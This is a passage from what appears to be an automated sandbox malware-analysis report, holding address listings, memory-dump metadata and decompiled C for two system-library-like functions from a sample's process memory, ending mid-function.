0x3289cd54
0x3289cd4f
0x3289cd4f
0x3289cd4f
0x3289cd56
0x3289cd59
0x3289cd5c
0x3289cd63
0x3289cd63
0x3289cd5e
0x3289cd5e
0x3289cd5e
0x3289cd65
0x3289cd68
0x3289cd6b
0x3289cd6e
0x3289cd70
0x3289cd73
0x3289cd73
0x3289cd7b
0x3289cd7e
0x3289cd81
0x3289cd86
0x3289cd88
0x3289cd8b
0x3289cd8d
0x00000000
0x3289cd93
0x3289cd94
0x3289cd98
0x3289cd9a
0x3289cd9d
0x3289cda2
0x3289cda9
0x00000000
0x3289cda9
0x00000000
0x3289cdb0
0x3289cdb4
0x3289cd16
0x3289cd16
0x3289cd1a
0x00000000
0x3289cd1a
0x3289cdba
0x3289cdbe
0x00000000
0x00000000
0x3289cdc7
0x3289cdca
0x3289cddd
0x3289cde1
0x3289cdf0
0x3289cdf6
0x3289cdfb
0x3289cdfd
0x3289ccff
0x3289ccff
0x3289cd01
0x00000000
0x3289cd01
0x3289ce03
0x3289ce07
0x3289ce0a
0x3289ce10
0x3289ce10
0x00000000
0x3289ce0a
0x3289cde3
0x3289cde7
0x00000000
0x3289cde7
0x00000000
0x00000000
0x3289ce18
0x3289ce1c
0x3289ce2b
0x3289ce2f
0x3289ce32
0x3289ce1e
0x3289ce1e
0x3289ce22
0x3289ce22
0x00000000
0x00000000
0x3289ce3b
0x3289ce3f
0x00000000
0x00000000
0x00000000
0x00000000
0x3289ce4e
0x3289ce52
0x3289ce56
0x3289ce59
0x00000000
0x00000000
0x3289ce5f
0x3289ce61
0x3289ce65
0x3289ce6a
0x3289ce6c
0x3289cedb
0x3289cedd
0x3289cee1
0x3289cee5
0x00000000
0x3289cee5
0x3289ce74
0x3289ce7a
0x3289ce7e
0x3289ce84
0x3289cec5
0x3289cec5
0x3289cec7
0x3289cecb
0x3289cecb
0x3289cece
0x3289ced2
0x00000000
0x3289ced2
0x3289ce86
0x3289ce94
0x3289ce98
0x3289ce9f
0x3289cea5
0x3289ceaa
0x3289ceae
0x3289ceb1
0x00000000
0x00000000
0x3289ceb3
0x3289ceb4
0x3289ceba
0x3289cebd
0x00000000
0x00000000
0x3289ceee
0x3289cef0
0x3289cef2
0x3289cef7
0x3289ce41
0x3289ce41
0x3289ce45
0x00000000
0x3289ce45
0x3289cf01
0x3289cf04
0x3289cf09
0x3289cf0b
0x00000000
0x00000000
0x3289cf11
0x3289cf17
0x00000000
0x00000000
0x3289cf1d
0x3289cf20
0x3289cf22
0x00000000
0x00000000
0x3289cf32
0x3289cf3e
0x3289cf45
0x3289cf4a
0x3289cf4c
0x00000000
0x00000000
0x3289cf52
0x3289cf59
0x00000000
0x00000000
0x3289cf62
0x3289cf66
0x3289cf6a
0x3289cf6c
0x3289cf6e
0x3289cf73
0x00000000
0x00000000
0x3289cf79
0x3289cf81
0x3289cf9a
0x3289cf9d
0x3289cf83
0x3289cf83
0x3289cf8a
0x3289cf91
0x3289cf95
0x3289cf95
0x00000000
0x00000000
0x3289cfa3
0x3289cfa7
0x3289cfab
0x3289cfb1
0x3289cfb2
0x3289cfb4
0x3289cfb9
0x3289cfbc
0x3289cfbe
0x3289cfc0
0x3289cfc7
0x3289cfc7
0x00000000
0x00000000
0x3289cfcd
0x3289cfd1
0x3289cfd5
0x3289cfdb
0x3289cfdc
0x3289cfde
0x3289cfe3
0x3289cfe6
0x3289cfe8
0x3289cfea
0x3289cff0
0x3289cff6
0x3289cff8
0x3289cffb
0x3289cffb
0x3289cff6
0x00000000
0x00000000
0x3289d001
0x3289d006
0x00000000
0x00000000
0x3289d00c
0x3289d00c
0x3289d00c
0x3289d00f
0x3289d012
0x3289d014
0x3289d016
0x3289d018
0x3289d02a
0x3289d02d
0x3289d030
0x3289d033
0x3289d036
0x3289d03c
0x3289d03f
0x00000000
0x3289d03f
0x3289d01d
0x3289d020
0x00000000
0x00000000
0x3289d022
0x3289ccd9
0x00000000
0x00000000
0x3289ccf0
0x3289cbdc
0x3289cbde
0x3289cbe1
0x3289cbe3
0x3289cc7d
0x3289cc7d
0x3289cc7f
0x3289cc94
0x3289cc94
0x3289cc9c
0x3289cc9c
0x3289cc9f
0x3289d2c8
0x3289d2cd
0x3289d2cd
0x3289d2d0
0x3289d2d0
0x3289d2d6
0x3289d33b
0x3289d33b
0x3289d33e
0x3289d33e
0x3289d344
0x3289d352
0x3289d354
0x3289d356
0x3289d35b
0x3289d3ef
0x3289d3ef
0x3289d3f6
0x00000000
0x3289d3f6
0x3289d361
0x3289d366
0x00000000
0x00000000
0x3289d36c
0x3289d36e
0x00000000
0x00000000
0x3289d374
0x3289d378
0x00000000
0x00000000
0x3289d37c
0x3289d382
0x3289d388
0x3289d38b
0x3289d38e
0x3289d391
0x3289d396
0x3289d396
0x3289d39e
0x3289d3a1
0x3289d3ab
0x3289d3ad
0x3289d3b0
0x3289d3b2
0x00000000
0x3289d3b4
0x3289d3bc
0x3289d3c0
0x3289d3c5
0x3289d3cc
0x00000000
0x3289d3cc
0x3289d3b2
0x3289d346
0x3289d34c
0x00000000
0x00000000
0x00000000
0x3289d34c
0x3289d2d8
0x3289d2de
0x3289d2e8
0x3289d2e8
0x3289d2eb
0x3289d2ee
0x3289d2f2
0x3289d2f8
0x3289d2fe
0x3289d301
0x3289d304
0x3289d307
0x3289d30c
0x3289d30c
0x3289d31b
0x3289d321
0x3289d326
0x3289d32b
0x3289d32d
0x3289d332
0x3289d334
0x3289d336
0x3289d336
0x3289d332
0x3289d32b
0x00000000
0x3289d2ee
0x3289d2e0
0x3289d2e6
0x00000000
0x00000000
0x00000000
0x3289d2e6
0x3289cca5
0x3289cca5
0x3289cca8
0x3289d2c1
0x00000000
0x3289d2c1
0x3289ccae
0x3289ccb1
0x3289ccbd
0x3289ccc2
0x3289ccc5
0x3289ccc9
0x00000000
0x00000000
0x3289cccf
0x00000000
0x3289cccf
0x3289ccb3
0x00000000
0x3289ccb3
0x3289cc81
0x3289cc83
0x00000000
0x00000000
0x3289cc88
0x3289cc8a
0x3289cc8c
0x00000000
0x3289cc8c
0x3289cbe9
0x3289cbeb
0x00000000
0x00000000
0x3289cbf4
0x3289cbf6
0x3289cbfc
0x3289cc03
0x3289cc0b
0x3289cc23
0x3289cc23
0x3289cc29
0x3289cc2f
0x3289cc36
0x3289cc44
0x3289cc47
0x3289cc5b
0x3289cc6a
0x3289cc6a
0x3289cc6d
0x3289cc6f
0x3289cc72
0x3289cc75
0x00000000
0x3289cc75
0x3289cb90
0x3289cb2c
0x3289cb33
0x00000000
0x3289cb33
0x3289cb1d
0x3289cb1d
0x3289cb1f
0x3289cb1f
0x00000000
0x3289cb1f
0x3289c882
0x3289c886
0x3289c88e
0x3289caf2
0x3289caf7
0x3289cafa
0x00000000
0x00000000
0x3289cb14
0x3289cb16
0x00000000
0x3289cb16
0x3289c898
0x00000000
0x00000000
0x3289c89e
0x3289c8a6
0x00000000
0x00000000
0x3289c8b2
0x3289c8bc
0x3289caee
0x00000000
0x3289c8cb
0x3289c8d2
0x3289c8d8
0x3289c8da
0x3289c8de
0x3289c8e0
0x3289c8e0
0x3289c8e6
0x3289c8ee
0x00000000
0x00000000
0x3289c8f4
0x3289c8f9
0x3289cac6
0x3289cac9
0x00000000
0x3289c90c
0x3289c90e
0x00000000
0x3289c914
0x3289c91c
0x3289cad1
0x3289cad1
0x3289cad4
0x3289cadd
0x3289cae2
0x00000000
0x00000000
0x3289cae4
0x00000000
0x3289cae4
0x3289c90e
0x3289c8f9
0x3289cacf
0x3289cacf
0x00000000
0x3289cacf
0x3289c8bc
0x3289c7af
0x3289c7b5
0x00000000
0x3289c7b7
0x3289c7ba
0x3289c7c2
0x3289c7c2
0x3289c7bc
0x3289c7bc
0x3289c7bc
0x3289c7c4
0x3289c7c7
0x3289c7cb
0x3289c7d0
0x3289c7fc
0x3289c803
0x00000000
0x3289c826
0x3289c826
0x3289c829
0x00000000
0x3289c829
0x3289c7d7
0x3289c7dd
0x3289c927
0x3289c927
0x3289c92e
0x3289c938
0x3289c943
0x3289c947
0x3289c94c
0x3289c94f
0x3289c952
0x3289ca4a
0x3289ca4a
0x3289ca4f
0x3289ca4f
0x3289ca52
0x3289ca52
0x3289ca54
0x3289ca57
0x3289ca5d
0x00000000
0x00000000
0x3289ca63
0x3289ca68
0x3289ca6b
0x3289ca71
0x3289ca73
0x3289ca78
0x3289ca7b
0x3289ca7e
0x3289ca81
0x3289ca88
0x3289ca88
0x3289ca83
0x3289ca83
0x3289ca83
0x3289ca8a
0x3289ca8d
0x3289ca90
0x3289ca97
0x3289ca97
0x3289ca92
0x3289ca92
0x3289ca92
0x3289ca99
0x3289ca9c
0x3289ca9f
0x3289caa4
0x3289caa4
0x3289caad
0x3289cab7
0x3289cab7
0x00000000
0x3289ca71
0x3289c958
0x3289c95a
0x3289ca09
0x3289ca0c
0x3289ca0d
0x3289ca11
0x3289ca13
0x3289ca14
0x3289ca19
0x3289ca1b
0x3289ca24
0x3289ca27
0x3289ca2a
0x3289ca31
0x3289ca33
0x3289ca33
0x3289ca39
0x3289ca39
0x3289ca3c
0x3289ca40
0x00000000
0x00000000
0x3289ca42
0x3289ca1d
0x3289ca1d
0x3289ca1d
0x00000000
0x3289ca1b
0x3289c960
0x3289c967
0x3289c96e
0x3289c984
0x3289c989
0x3289c98b
0x3289c991
0x3289c993
0x3289c9b9
0x3289c9bb
0x3289c9c1
0x3289c9c3
0x3289c9db
0x3289c9dd
0x3289c9e0
0x00000000
0x3289c9e0
0x3289c9c5
0x3289c9c8
0x3289c9ce
0x3289c9e5
0x00000000
0x3289c9d0
0x3289c9d0
0x3289c9d5
0x00000000
0x3289c9d5
0x3289c995
0x3289c995
0x3289c99c
0x3289c9ef
0x3289c9ef
0x3289c9f1
0x3289c9f2
0x3289c9f4
0x3289c9f6
0x3289c9f7
0x3289c9f9
0x3289c9fd
0x3289ca02
0x3289ca05
0x3289ca07
0x00000000
0x00000000
0x00000000
0x3289ca07
0x3289c7f9
0x3289c7f9
0x00000000
0x3289c7f9
0x3289c7dd
0x3289c7d0
0x3289c7b5
0x3289c77e
0x00000000
0x00000000
0x3289c786
0x00000000
0x3289c788
0x3289c788
0x3289c78d
0x00000000
0x3289c78d
0x00000000
0x00000000
0x00000000
0x3289d3fa
0x3289d3fa
0x3289d3fa
0x3289d3ff
0x3289d402
0x3289d40a
0x3289d40b
0x3289d40c
0x3289d41a
0x3289d41a

Strings

MUI, xrefs: 3289C7E3, 3289C960

Memory Dump Source

Source File: 00000003.00000002.1092236541.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true

Associated: 00000003.00000002.1092236541.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1092236541.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32860000_wLlREXsA9M.jbxd

Similarity

API ID:
String ID: MUI
API String ID: 0-1339004836
Opcode ID: 837c38299ffa246b61649ceba57faad2574639c2f5977620d76cc86916d18502
Instruction ID: d4af68554562f0a7adf2c00745a8b3710afac6455421b4686ce8e6e8edeb7ab6
Opcode Fuzzy Hash: 837c38299ffa246b61649ceba57faad2574639c2f5977620d76cc86916d18502
Instruction Fuzzy Hash: E4825ABDE003089FEB14CFA9C880BDDB7B5FF49358F50816AE819AB290DB719945CB54

Uniqueness

Uniqueness Score: -1.00%

Function 328964F0 Relevance: 1.9, APIs: 1, Instructions: 383
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E328964F0(void* __ebx, void* __ecx, void* __edx, void* __edi, signed int _a4, signed int _a8, intOrPtr _a12, char* _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int* _v20;
				signed int _v24;
				intOrPtr* _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				signed int _v44;
				char _v48;
				char _v52;
				signed int _v56;
				char _v57;
				char _v58;
				char _v59;
				char _v60;
				char _v61;
				intOrPtr _v72;
				intOrPtr* _t167;
				intOrPtr _t168;
				intOrPtr _t169;
				char _t170;
				signed short _t178;
				signed int _t183;
				intOrPtr* _t185;
				signed int _t191;
				signed int _t197;
				signed int _t198;
				signed int _t202;
				signed int _t206;
				signed int _t209;
				intOrPtr _t211;
				signed int _t231;
				intOrPtr _t232;
				signed int _t241;
				intOrPtr _t244;
				intOrPtr _t245;
				signed int _t246;
				signed int _t247;
				intOrPtr _t248;
				intOrPtr _t250;
				signed int _t252;
				signed int _t260;
				signed int _t262;
				signed int* _t265;
				intOrPtr _t267;
				signed int _t270;
				signed int _t276;
				signed int* _t278;
				signed int* _t281;
				signed int _t282;
				intOrPtr _t284;
				intOrPtr _t285;
				signed int _t286;
				intOrPtr _t289;
				intOrPtr* _t290;
				void* _t292;
				signed int _t293;
				intOrPtr _t297;
				signed int _t300;
				void* _t302;
				intOrPtr _t303;
				signed int _t311;
				signed int _t317;
				void* _t319;

				_t319 = (_t317 & 0xfffffff8) - 0x3c;
				_t241 = 0;
				_v61 = 0;
				_t167 = __ecx + 0xb4;
				_v40 = 0;
				_v52 = 0;
				_v48 = 0;
				_v56 = 0;
				_v60 = 0;
				_v24 = _t167;
				if(__edx == _t167) {
					_t168 =  *_t167;
					_v61 = _t168 != 0;
					_v60 = _t168 == 0;
					goto L7;
				} else {
					 *_t167 = 0;
					_t183 =  &_v12;
					_v8 = _t183;
					_v12 = _t183;
					_t185 = __edx + (_a8 * 8 - _a8) * 4;
					_t260 = _a4;
					_v28 = _t185;
					_t300 = _t260;
					 *((intOrPtr*)(_t185 + 4)) =  *((intOrPtr*)(_t185 + 4)) - 1 + _t260;
					_t311 = (_t260 << 4) + __edx;
					_t262 = __edx + 0x10 + (_t260 * 8 - _t260) * 4;
					do {
						_t191 =  *(_t311 - 0x10);
						_t311 = _t311 - 0x10;
						_t262 = _t262 - 0x1c;
						_v32 = _t191;
						_t300 = _t300 - 1;
						_v44 = _t262;
						if(_t191 != 0) {
							if(_v61 != 0) {
								_v36 = _t191 + 0x14;
								L328D8C00(_t262 - 0x10, _t311, "true");
								_t319 = _t319 + 0xc;
								 *((intOrPtr*)(_v44 + 8)) = _v28;
								L328A2330(_v44, _v36);
								_t265 = _v36 + 0x18;
								_v20 = _t265;
								_t286 = _t265[1];
								_t197 =  *_t265;
								_v24 = _t197;
								if( *_t286 != _t265) {
									L59:
									asm("int 0x29");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									_t267 = _v72;
									_t198 = _t197 | 0xffffffff;
									asm("lock xadd [ecx], eax");
									if(_t198 == 0) {
										 *0x329891e0(_t267, _t311);
										return  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t267 + 4))))))();
									}
									return _t198;
								} else {
									_t202 = _v44;
									 *_t202 = _t265;
									 *(_t202 + 4) = _t286;
									 *_t286 = _t202;
									_t265[1] = _t202;
									E328A24D0(_v36);
									_v52 = _v52 + 1;
									if(_v24 != _v20) {
										goto L24;
									} else {
										_t281 = _v8;
										_t197 = _v32 + 0xc;
										_t250 = _v56;
										if( *_t281 !=  &_v12) {
											goto L59;
										} else {
											 *(_t197 + 4) = _t281;
											 *_t197 =  &_v12;
											_t241 = _t250 + 1;
											 *_t281 = _t197;
											_v8 = _t197;
											_v56 = _t241;
											goto L23;
										}
									}
								}
							} else {
								_t282 = _v24;
								_v61 = 1;
								 *_t282 = _t191;
								 *((intOrPtr*)(_t282 + 4)) =  *((intOrPtr*)(_t311 + 4));
								 *((intOrPtr*)(_t282 + 8)) =  *((intOrPtr*)(_t311 + 8));
								 *((intOrPtr*)(_t282 + 0xc)) =  *((intOrPtr*)(_t311 + 0xc));
								L23:
								_t289 = _v48;
								L24:
								_t262 = _v44;
								goto L4;
							}
						} else {
							_t289 = _v48;
							_v60 = 1;
							goto L4;
						}
						goto L72;
						L4:
					} while (_t300 != 0);
					_t206 = _a4 - 1;
					if(_t289 != _t206) {
						_t290 = _v28;
						asm("lock xadd [ecx], eax");
						if((_t206 | 0xffffffff) == 0) {
							_t232 =  *0x32986644; // 0x0
							E328A3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t232 + 0x300000,  *_t290);
						}
					}
					if(_t241 != 0) {
						_t209 =  &_v12 - 0xc;
						_t302 = _v12 + 0xfffffff4;
						_t270 = 0xfffffffe;
						_v16 = _t209;
						_t311 = 0;
						_v44 = 0xfffffffe;
						if(_t302 != _t209) {
							_t248 = 0;
							do {
								_t231 = E328D6600(1,  *(_t302 + 4), 0);
								_t270 = _v44;
								_t311 = _t311 | _t231;
								if(_t270 != 0xffffffff) {
									if(_t270 != 0xfffffffe) {
										if(_t270 ==  *(_t302 + 4)) {
											goto L41;
										} else {
											_t270 = _t270 | 0xffffffff;
											goto L40;
										}
										while(1) {
											L48:
											_t197 = _v12;
											if(_t197 ==  &_v12) {
												break;
											}
											_t292 =  *_t197;
											if( *(_t292 + 4) != _t197) {
												goto L59;
											} else {
												_t276 =  *(_t197 + 4);
												if( *_t276 != _t197) {
													goto L59;
												} else {
													 *_t276 = _t292;
													 *(_t292 + 4) = _t276;
													_t293 = _t197;
													_t197 =  *((intOrPtr*)(_t303 + 0x14)) + ( *(_t197 - 8) +  *(_t197 - 8) * 2) * 4;
													_t278 =  *(_t197 + 4);
													if( *_t278 != _t197) {
														goto L59;
													} else {
														 *_t293 = _t197;
														 *(_t293 + 4) = _t278;
														 *_t278 = _t293;
														 *(_t197 + 4) = _t293;
														continue;
													}
												}
											}
											goto L72;
										}
										if(_v52 != 0) {
											_t245 = _v52;
											do {
												asm("bsr esi, ebx");
												E328A24D0( *((intOrPtr*)(_t303 + 0x14)) + (_t311 + _t311 * 2) * 4 + 0x188);
												asm("btr ebx, esi");
											} while (_t245 != 0);
											_t241 = _v56;
											_t311 = _v40;
										}
										if(_t311 != 0) {
											_t246 = _v40;
											do {
												asm("bsr esi, ebx");
												E328A24D0( *((intOrPtr*)(_t303 + 0x14)) + (_t311 + _t311 * 2) * 4 + 8);
												asm("btr ebx, esi");
											} while (_t246 != 0);
											_t241 = _v56;
										}
										goto L7;
									} else {
										_t270 =  *(_t302 + 4);
										L40:
										_v44 = _t270;
									}
								}
								L41:
								_t302 =  *((intOrPtr*)(_t302 + 0xc)) - 0xc;
							} while (_t302 != _v16);
							_v52 = _t248;
							_t241 = _v56;
							_v40 = _t311;
						}
						_t303 = _a12;
						L3288BD3D(_t303, _t270);
						_t211 = _v52;
						_v16 = _t311;
						if(_t311 != 0) {
							_t247 = _t311;
							do {
								asm("bsf esi, ebx");
								L328A2330( *((intOrPtr*)(_t303 + 0x14)) + (_t311 + _t311 * 2) * 4 + 8,  *((intOrPtr*)(_t303 + 0x14)) + (_t311 + _t311 * 2) * 4 + 8);
								asm("btr ebx, esi");
							} while (_t247 != 0);
							_t241 = _v56;
							_t311 = _v40;
							_t211 = _v52;
						}
						if(_t211 != 0) {
							_t244 = _v52;
							do {
								asm("bsf esi, ebx");
								L328A2330( *((intOrPtr*)(_t303 + 0x14)) + (_t311 + _t311 * 2) * 4 + 0x188,  *((intOrPtr*)(_t303 + 0x14)) + (_t311 + _t311 * 2) * 4 + 0x188);
								asm("btr ebx, esi");
							} while (_t244 != 0);
							_t241 = _v56;
							_t311 = _v40;
						}
						goto L48;
					} else {
						L7:
						_t169 = _a12;
						_t252 =  *(_t169 + 8);
						_t284 =  *((intOrPtr*)(_t169 + 0xc));
						do {
							_t170 =  *((intOrPtr*)(_t169 + 0xe4));
							_t297 = _t284;
							_v32 = _t252;
							_v58 = 0;
							_v59 = 0;
							_v57 = _t170;
							_t285 = _t297 + _t241;
							_v28 = _t285;
							if(_t170 == 0) {
								_t178 = (_t252 - 0x00000001 ^ _t252) & 0x0000ffff ^ _t252;
								_t252 = _t178;
								if(_v60 != 0) {
									_t252 = (_t252 >> 0x00000010) - 0x00000001 << 0x00000010 | _t178 & 0x0000ffff;
								}
								if(_v61 == 0) {
									if(_t285 == 0) {
										_v58 = 1;
										_t252 = _t252 ^ (_t252 + 0x00000001 ^ _t252) & 0x0000ffff;
									} else {
										_t285 = _t285 - 1;
										_v28 = _t285;
									}
								}
								if(_t241 != 0 || _v60 != _t241) {
									if(_t285 != 0) {
										if((_t252 & 0xffff0000) == 0) {
											_t252 = _t252 + 0x10000;
											_v59 = 1;
										}
									}
								}
							}
							_t284 = _t297;
							asm("lock cmpxchg8b [esi]");
							_t241 = _v56;
							_t252 = _v32;
							_t169 = _a12;
						} while (_t252 != _v32 || _t284 != _t297);
						if(_v59 != 0) {
							_push( *((intOrPtr*)(_t169 + 0x24)));
							E328D40A0();
						}
						 *_a16 = _v58;
						return _v57;
					}
				}
				L72:
			}

0x328964f8
0x328964fc
0x328964fe
0x32896503
0x32896509
0x32896511
0x32896519
0x32896521
0x32896525
0x32896529
0x32896531
0x328f0eef
0x328f0ef3
0x328f0efa
0x00000000
0x32896537
0x32896537
0x32896539
0x3289653d
0x32896541
0x32896551
0x32896554
0x3289655a
0x32896560
0x32896565
0x32896573
0x3289657a
0x32896580
0x32896580
0x32896583
0x32896586
0x32896589
0x3289658d
0x3289658e
0x32896594
0x32896688
0x32896715
0x3289671e
0x32896727
0x32896732
0x32896735
0x3289673e
0x32896741
0x32896745
0x32896748
0x3289674a
0x32896750
0x328968f1
0x328968f6
0x328968f8
0x328968f9
0x328968fa
0x328968fb
0x328968fc
0x328968fd
0x328968fe
0x328968ff
0x32896905
0x32896908
0x3289690b
0x3289690f
0x3289691e
0x00000000
0x32896926
0x32896912
0x32896756
0x32896756
0x3289675e
0x32896760
0x32896763
0x32896765
0x32896768
0x32896776
0x3289677e
0x00000000
0x32896784
0x32896784
0x32896790
0x32896795
0x32896799
0x00000000
0x3289679f
0x328967a3
0x328967a6
0x328967a8
0x328967a9
0x328967ab
0x328967af
0x00000000
0x328967af
0x32896799
0x3289677e
0x3289668e
0x3289668e
0x32896692
0x32896697
0x3289669c
0x328966a2
0x328966a8
0x328966ab
0x328966ab
0x328966af
0x328966af
0x00000000
0x328966af
0x3289659a
0x3289659a
0x3289659e
0x00000000
0x3289659e
0x00000000
0x328965a3
0x328965a3
0x328965aa
0x328965ad
0x328966f7
0x32896701
0x32896705
0x328f0f06
0x328f0f1a
0x328f0f1a
0x32896705
0x328965b5
0x328967c0
0x328967c3
0x328967c6
0x328967cb
0x328967cf
0x328967d1
0x328967d7
0x328967d9
0x328967e0
0x328967ea
0x328967ef
0x328967f3
0x328967fa
0x328967ff
0x328f0f27
0x00000000
0x328f0f2d
0x328f0f2d
0x00000000
0x328f0f2d
0x32896870
0x32896870
0x32896870
0x3289687a
0x00000000
0x00000000
0x3289687c
0x32896881
0x00000000
0x32896883
0x32896883
0x32896888
0x00000000
0x3289688a
0x3289688a
0x3289688c
0x3289688f
0x3289689a
0x3289689d
0x328968a2
0x00000000
0x328968a4
0x328968a4
0x328968a6
0x328968a9
0x328968ab
0x00000000
0x328968ab
0x328968a2
0x32896888
0x00000000
0x32896881
0x328968b5
0x328968e8
0x328f0f64
0x328f0f67
0x328f0f76
0x328f0f7b
0x328f0f7e
0x328f0f82
0x328f0f86
0x328f0f86
0x328968b9
0x328968bf
0x328968c3
0x328968c6
0x328968d3
0x328968d8
0x328968db
0x328968df
0x328968df
0x00000000
0x32896805
0x32896805
0x32896808
0x32896808
0x32896808
0x328967ff
0x3289680c
0x3289680f
0x32896812
0x32896818
0x3289681c
0x32896820
0x32896820
0x32896824
0x3289682b
0x32896830
0x32896834
0x3289683a
0x3289683c
0x32896840
0x32896843
0x32896850
0x32896855
0x32896858
0x3289685c
0x32896860
0x32896864
0x32896864
0x3289686a
0x328f0f35
0x328f0f39
0x328f0f3c
0x328f0f4b
0x328f0f50
0x328f0f53
0x328f0f57
0x328f0f5b
0x328f0f5b
0x00000000
0x328965bb
0x328965bb
0x328965bb
0x328965be
0x328965c4
0x328965d0
0x328965d0
0x328965d6
0x328965d8
0x328965dc
0x328965e1
0x328965e6
0x328965ea
0x328965ed
0x328965f3
0x328965fd
0x32896604
0x32896606
0x32896612
0x32896612
0x32896619
0x3289661d
0x328966bb
0x328966c5
0x32896623
0x32896623
0x32896624
0x32896624
0x3289661d
0x3289662a
0x32896634
0x328966d2
0x328966d8
0x328966de
0x328966de
0x328966d2
0x32896634
0x3289662a
0x3289663e
0x32896647
0x3289664b
0x3289664f
0x32896651
0x32896654
0x3289666b
0x328966ea
0x328966ed
0x328966ed
0x32896676
0x32896680
0x32896680
0x328965b5
0x00000000

Memory Dump Source

Source File: 00000003.00000002.1092236541.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true

Associated: 00000003.00000002.1092236541.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1092236541.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32860000_wLlREXsA9M.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c1d2dd9ba04e8e86c02b5ec99bebba1f9543274366001852291aab5534c51fa
Instruction ID: 9e8cba6b729f8265137efbddc00fe38778dffe2eb70e1c4a9abb44e922b9acde
Opcode Fuzzy Hash: 9c1d2dd9ba04e8e86c02b5ec99bebba1f9543274366001852291aab5534c51fa
Instruction Fuzzy Hash: F6E19E78609351CFD705CF28C090A9ABBE0FF89358F058A6DE99997351DB31E906CF92

Uniqueness

Uniqueness Score: -1.00%

Function 32891051 Relevance: 1.8, APIs: 1, Instructions: 259
timeCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E32891051(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char* _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				char _v63;
				char _v64;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				intOrPtr* _v92;
				void* _v96;
				signed int _v100;
				signed int _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t151;
				signed int _t153;
				signed int _t154;
				signed int _t155;
				intOrPtr _t160;
				signed int _t161;
				signed int _t172;
				intOrPtr _t180;
				signed int _t195;
				signed int _t196;
				char _t197;
				signed int _t200;
				void* _t201;
				intOrPtr _t202;
				signed int _t204;
				intOrPtr* _t206;
				intOrPtr _t207;
				char _t209;
				signed int _t210;
				intOrPtr _t214;
				intOrPtr* _t220;
				signed int _t222;
				signed int _t223;
				intOrPtr _t226;
				intOrPtr _t227;
				void* _t232;
				signed int _t233;
				signed int _t234;
				void* _t235;
				intOrPtr _t238;
				signed int _t239;
				void* _t243;
				signed int _t244;
				signed int _t246;
				signed int _t247;

				_t246 = (_t244 & 0xfffffff8) - 0x6c;
				_v8 =  *0x3298b370 ^ _t246;
				_t238 = __edx;
				_t226 = __ecx;
				_v36 = 0;
				_t204 = 6;
				_t232 =  &_v84;
				_v52 =  *((intOrPtr*)(__ecx + 0x48));
				_v40 =  *((intOrPtr*)(__edx + 0xc8));
				_v32 = __edx;
				_v48 = __ecx;
				_t151 = memset(_t232, 0, _t204 << 2);
				_t247 = _t246 + 0xc;
				_t233 = _t232 + _t204;
				if(_v52 == 2) {
					_t234 =  *(_t226 + 0x60);
					_t200 =  *(_t226 + 0x64);
					_v63 =  *((intOrPtr*)(_t226 + 0x4c));
					_t153 =  *((intOrPtr*)(_t226 + 0x58));
					_v104 = _t153;
					_v76 = _t153;
					_t154 =  *((intOrPtr*)(_t226 + 0x5c));
					_v100 = _t154;
					_v72 = _t154;
					_t155 = 0;
					L19:
					_v80 = _t200;
					_v84 = _t234;
					L8:
					if( *((intOrPtr*)(_t226 + 0x74)) > 0) {
						_t206 = _t226 + 0x84;
						_v92 = _t206;
						while(1) {
							_t207 =  *_t206;
							if(_t207 >= 0 || _t207 == 0x80000000) {
								break;
							}
							_t155 = _t155 + 1;
							_t206 = _v92 + 0x10;
							_v92 = _t206;
							if(_t155 <  *((intOrPtr*)(_t226 + 0x74))) {
								continue;
							}
							goto L9;
						}
						_v88 = _t155 << 4;
						_t239 = _v88;
						_t209 = _t226 +  *((intOrPtr*)(_t239 + _t226 + 0x78));
						_v44 = _t209;
						asm("adc eax, [esi+edx+0x7c]");
						_v24 = 0;
						_v28 = _t209;
						_v20 =  *((intOrPtr*)(_t239 + _t226 + 0x80));
						_t160 =  *_v92;
						_v36 =  &_v28;
						_t238 = _v32;
						_v16 = _t160;
						if( *(_t226 + 0x4e) >= 0 || _t160 != 0x80000000) {
							goto L9;
						} else {
							 *((intOrPtr*)(_t209 + 8)) = 0;
							 *((intOrPtr*)(_t209 + 0xc)) = 0;
							 *((intOrPtr*)(_t209 + 0x14)) = 0;
							 *((intOrPtr*)(_t209 + 0x10)) = _v20;
							_t214 = 0;
							_t172 = _t238 + 0x66;
							_v92 = 0;
							_v88 = _t172;
							do {
								if( *((char*)(_t172 - 2)) == 0) {
									goto L31;
								}
								_t214 = _v92;
								if(( *_t172 & 0x000000ff) == ( *(_t226 + 0x4e) & 0x7fff)) {
									_t172 = E328D6600(1, _t214 + 0x20, 0);
									_t214 = _v44;
									 *(_t214 + 8) = _t172;
									 *((intOrPtr*)(_t214 + 0xc)) = 0;
									L34:
									if(_v40 == 0) {
										goto L9;
									}
									_t202 = _v40;
									_t236 = _t202 + 0x1c;
									L328A2330(_t172, _t202 + 0x1c);
									 *((intOrPtr*)(_t202 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
									_t176 =  *((intOrPtr*)(_t202 + 0x94));
